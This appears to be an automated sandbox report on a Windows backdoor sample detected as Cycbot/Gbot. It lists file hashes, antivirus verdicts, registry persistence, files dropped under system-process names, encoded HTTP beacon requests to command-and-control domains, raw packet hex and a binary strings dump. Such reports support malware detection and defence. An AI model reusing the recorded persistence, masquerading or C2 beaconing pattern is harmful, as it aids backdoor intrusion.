Analysis Date2014-11-19 12:17:20
MD5e03e3dae0bf4985d89b4d3ecbf13a64a
SHA11d3054e4725d7d418be9d9063f5b18e70c7707ff

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 105b2895ce39d1cf9b29ff433a88bd53 sha1: 4e028abcb58fda86a03057e8cf0cdacdb6741d48 size: 123904
Section.rdata md5: a40badba55354ed7974106d193320679 sha1: cf5b98653678f05717098b9751be6025b879329e size: 1024
Section.data md5: 8bb7e4334c7085e71bd7dd13b3fd9e5d sha1: b4e0a72dd14204b35795fa2f36d700136ce7ba03 size: 72704
Section.reloc md5: c17ee98e71ca131cd2f7807db227bcae sha1: 2423a4eaff225e0d6cbec22fdf63e6072358f8b2 size: 1024
Timestamp2005-09-04 19:25:25
PEhashb4b7ebec857f90d93a90e5d45ffc41632c311fd7
IMPhash4f64d14cfcf21e4d661b7aae5a716816
AV360 SafeGen:Heur.Conjar.5
AVAd-AwareGen:Heur.Conjar.5
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVBullGuardGen:Heur.Conjar.5
AVCA (E-Trust Ino)Win32/Cycbot.G!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-449
AVDr. WebBackDoor.Gbot.73 - infected, incurable
AVEmsisoftGen:Heur.Conjar.5
AVEset (nod32)Win32/Kryptik.SXV
AVFortinetW32/Kryptik.SMY!tr.bdr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureRogue:W32/OpenCloud.A
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.n
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.5
AVRisingBackdoor.Win32.Cycbot.a
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen7
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{5D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSfolusho.com
Winsock DNS127.0.0.1
Winsock DNSyourblogresources.com
Winsock DNScoolmediastore.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNSfolusho.com
Type: A
67.222.55.143
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSyourblogresources.com
Type: A
DNScoolmediastore.com
Type: A
HTTP GEThttp://folusho.com/wp-content/uploads/2010/09/web-20-what-is-300x251.jpg?v35=46&tq=gHZutDyMv5rJejTia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 67.222.55.143:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   75706c6f 6164732f 32303130 2f30392f   uploads/2010/09/
0x00000020 (00032)   7765622d 32302d77 6861742d 69732d33   web-20-what-is-3
0x00000030 (00048)   30307832 35312e6a 70673f76 33353d34   00x251.jpg?v35=4
0x00000040 (00064)   36267471 3d67485a 75744479 4d763572   6&tq=gHZutDyMv5r
0x00000050 (00080)   4a656a54 6961396e 726d736c 36676957   JejTia9nrmsl6giW
0x00000060 (00096)   7a253242 4a5a6256 79412533 44204854   z%2BJZbVyA%3D HT
0x00000070 (00112)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000080 (00128)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000090 (00144)   20666f6c 7573686f 2e636f6d 0d0a4163    folusho.com..Ac
0x000000a0 (00160)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x000000b0 (00176)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x000000c0 (00192)   2e300d0a 0d0a                         .0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384f6f 59764561 53505425   ij%2B8OoYvEaSPT%
0x000000c0 (00192)   32427371 70537225 32466525 32425635   2BsqpSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 4238796a 59764561 53253246   ij%2B8yjYvEaS%2F
0x000000c0 (00192)   54253242 73717453 72253246 65253242   T%2BsqtSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a7563 68206669    close....uch fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
.
.H..
7...
.
@
:`
..<..
_
.q

080904b0
1.0.0.1
1418
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
````````
``(@@~
^^@@@@
~~~~~~~~~
<<<<<<<<
<<<<<<<<<<<
>&&&&&&&&&&&&&&&
|||||||
|||||||||||
   &  
_______
_!-(@ !
-------
,,,,,,
,,,,,,,
;;;;;;
!!!!!!
!!!!!!!!!!,
///////
......
.......
.........................
""""""
))))))))))))))
[-*@ +
[[[[[[[[
]]]]]]
{{{{{{{{{{
@@@@@@@
@@@@@@@@
$$$$$$
*******
********
*******************
\\\\\\
&` .@`
&&&&"""""
&&&&&&
######
########
							
@`	[}0
0+/_*@
:0^5R'
0$ @%8g
0dB1P'
{>0 E+
_&0]#I3g
0PK{94
 0uFU&`
1100000000000000
11111/////
11111BBBBBBB
~1b)9v`8
1B=gkW
1N|-jZ@
1p052%	z
1`:Tq#;$
`1y|EF|
2222222
27aIEs1k
2~9i}E
%	2cs0
2%H!8a
2IXoVS8
!2MM{h
2na,Xs
2[	TI$
<3'~ @ 
3333333333
33333HHHHHH
|3b,6\-'
/_3h"_)m6
	 	3Ht.b
3rs[_F
*_3#!U3
`@4^{#
4#17A]p
   44  
4444444444
4	9\_s\
^4]"i"|
$@ 4K5
-4K	wQ
4z5vE=;
@5`*@`
555555
5555555
5555555555555555555555555
59;/}PT
5\ie1^
5Lt]|0
5*`@MH
5PVY=1MK
 '5Stpma
$@ +61d95+
666666
			666666
666666eeeeeeee
66PPPPP
]]]]6EEEEE
6j?Y	b
=|6kiO
6-l~fl0
7'3^3s
77777777
777777777777777777
7e~qIH
7/*`@EV
7hhhhhhhhh				
[[7@u5s
7X)qKXO
7y^aX%&
7YGv~^5
7Z6z}w
_<<,{8
@=(``8
86V?]X
888888
 [8ZMV
. @'9/
95`JU)
9999999999
9999999999999CCC
9D!eb~
9~G_Mux
9oo!R+
A&@ &`@
a97vPA
AA37eZ9
AAAAA4
AAAAAAeeeeeeeeeeeeeeeeee7777777
@@@aaay
ae_-1qHqa
AggkK	H{
@Aj;Bmm 
AKEV\'
A@[ lNJ 
*  Ar`
#aVZxw
B4%+9,
bbbbbbbbbbb
bbbbbbbbbbbbbbbbbb
bbbppp
@BCD_c
Bdwn%<f|
`bIl_=
b[m&` 
b?M4d{_GP
bqn`T#
#	{bW/
Bx.d9\5
 c. `a
cE<e~P
CG5ziu
ChDp'dQ
c<^j!?
cL%_eM
ClipCursor
C<<<<<<llllllllllrrrrrd
cNGT`v
cqc;Tk
"cr:b'
CreatePopupMenu
cyu)+w
_D_. `
~^d_4tU
@.data
\DB<3~
^dcUpv
ddddddd
dE_j#@
DestroyMenu
D~FQ2}
@`dg6>
Dgn6	s
DG){vP
d;lKest;
DM(g R{j
DuplicateHandle
[%'E'  
:e1ARIi
`]/e2m
}e2|-zT
`e.@`a
?e/a-i
ebLxb:
ed	C|#
EEEEEEEE
EEEEEs
EGxVrx
>E!!id
E\io^^F
EkE*FS.
EnumResourceNamesW
ePO!$`
e%)QnO
@E"  S
+[EtemM
E`WA4i
F(@ #1
F-+)3w
f@[5{M
!.`@fE
ffffff
fffffff
F	hY'WxP
FindClose
FindFirstFileA
FindResourceExA
FindWindowA
FlushInstructionCache
foO*En@F`t
\;fP-f
#)fpib
 f/qay@S^
f;T+j@W
*"	g&"
	`GcmN
'+G}e:
GetDesktopWindow
GetModuleFileNameW
						gg
))))GGGGGGG
ggggggggg
gggggggggg
GGGGGGGGGGGGGGGGG
@ g=Ii%
 g^M<~
 go$`@p. 
gwUi~M)
Gw	}_Z^
h* @]&
/"-H;_
H;2cV 
. @H4-
)#*h$C,
@&` h|D
H$|d1C7
H=DDDt
``H@	e
==========hh
hhhh||||
??HHHHHHHHH
@hI`:O2
]HJNhD
hkaGcw
hs69:`
HV|4=R
`@=&@ I
I12Nb/
i3A:O+L_
;;;;;;;;ii
IIIIIIIII
io.lY0D
iRAEEge
Iu16}A
i_Ul-fjA
JB$`@I
j* `G{
Jg	XGK
/JH!NVvK6
jjjj}}}}}}
jjjjjj
j}L]gL
-JP. @
k@2r* 
``K)3x
K4{<q.
K8EaFC
&k{|CC
KERNEL32.dll
K%gm>r
)KgU	#
<(@@k#h2
}kjWLbJR
KKKKKK
kkkkkkk
kkkkkkkkkkkkkWWWWWIIII
@_-kQ`
k[Q]z)
kw9?]l
KwW7[1X
L2/;"@
L}8i{H<Z
La7w$"
}L+bRT
<<<<<<lll
|||||||||,<LLL
LLLLLLLLLLLLLLLLLLLLL
 @<]m6q_n
MapViewOfFile
 Me|9@
]]]]MM
MMDDDDDDDD
mmmmmm
mmmmmmmmmmmmmmm
'M, `Qc1
 `]mT5
_m[v?O
m-zEZE
`N$`@=
N%0IXt4
N2@bHe
;nbEYY
nD1V_-
NdrComplexArrayFree
nF]6" 
NI0   f
nI4{C|B
NjKY3c.#
 n&n=3
NNNNNAAAAAA
nnnnnnnnn			\
nnnnnnnnnnnnn
NNNNNNNNNNNNNNNeGG
NNNNNNNNNNNNNNNNNNNN
N @ PS
nWWWWWWWWWkkkkkkkkkk
n*z\'@4
|o#1K@
O.36{[
O55I\Vk
?+\O7AIY
obSuo4
o>-?h>
Oi:r_E
o}mR1G
ooCCCnnn
OOOOOOO66
OOOOOOOOOO
OOOOsss
` OwI,`
!o{WQe~
``?p~%
;P=G;jm
P:Ko`-r
<p=mGs
@	pnj#
ppjjjjjjjjjjj
ppp;;;;;;;;
ppppppp
pV2%6l
Pygv9R
?`q(@@3
=Q-@345
(  q7"@`G
qBJaFn
qCmYuI9
  ?qG\
q|)h8'
QQQQC\-------KK
qqqqqqqqqqI
qqqqqqqqqqqq`
QQQrrrrr
Qw9_@n8
r&  ]7
`.rdata
RedrawWindow
.reloc
 rHH/i
rj;&lC/ciM
_~rK"p-
R=.l0H
rl6%K+
RO ``t78
RPCRT4.dll
-----rrrrrBB....'
rrrrrrr
rrrrrrrrrrrrrrrr-
R-W>ES
Rxn@:M
#=R)yy
S0nK+s
s4Q( `
sB"` ]
s#ej+8
SetFileShortNameW
sf'o\=
SHELL32.dll
Shell_NotifyIconA
Si{{qi(}
` sKn(
s-oUu1
sssDDDDDDDDDD
SSSSSSSS
*  Sx?7\(
s,@ z-
szx;/~I
%t'.@ 
t(@`. 
T3#/[e
T`4B$:
t5U+1C
T9oktY
t,a)+=
T_?'cH
t:"?_,G
!This program cannot be run in DOS mode.
timeEndPeriod
-;tj7oy
tq]m  
TrackPopupMenuEx
-_tTp2
ttttttttttt
TTTTTTTTTTT++++++
TTTTTTTTTTTT
tu(  5
|+t`vK
  )TwZw%
tY3t1Y
TySv`1
U3invO`
U=>"@`8q
uFz1-g
]UG:[]+
UHl5ut
UHz ~x
UnmapViewOfFile
@,  u:PQ
U#pWQ4
US/c<@
USER32
@`USl*`
UuidCreate
UUUUMM
uuuuuuu
""""uuuuuuuu
 @uyB?
u=y}D`
uzTf-}\
V)5#nop~
>v8SeBd
,v`$A:
vC7N `
v]+':F
Vg="``
vIjg=U
(Vt,2R
#~VtR~
V>Tr3T;
#V[T!:u
VVVVBB
Vx#D&@
Wag-/f
w*` cu
wF)S2R
WINMM.dll
w`k"qn3
%,WQHD
W<ToYXgZe
W	vv%|
^WyOw#
^/X(@@
>X0JL:
<{x.a1
@]Xc}q
)|Xj)\zn
xKQ@re_
]~X  `M
 	x?`qH
xT6A, 
xu.@ +Hs
xwwwwwww
X%X0Pb
x.` XD
/////								XXXXX
XXXXXX
==XXXXXX
xxxxxxsssssssssssssssss
XXXXXXXX
xxxxxxxxxx
%x:Z<zn
@.` y^
y37)h_g
ydM42=<r
yIX@)>.
yLgtqKm
YOWPc4
yq"S\k
yX=BV`
yyyyyy
YYYYYYYY
YYYYYYYYYY
:yyyyyyyyyyyyyyyyyy
  }z @
'-z_/>
z]leVW
z:m/fx
~[Z'<r
zr:i?3
Z$TBlSJ4a^a
%z" @z
ZZ44444
ZZZZZZZZZZ
zzzzzzzzzzz55
zzzzzzzzzzzzzz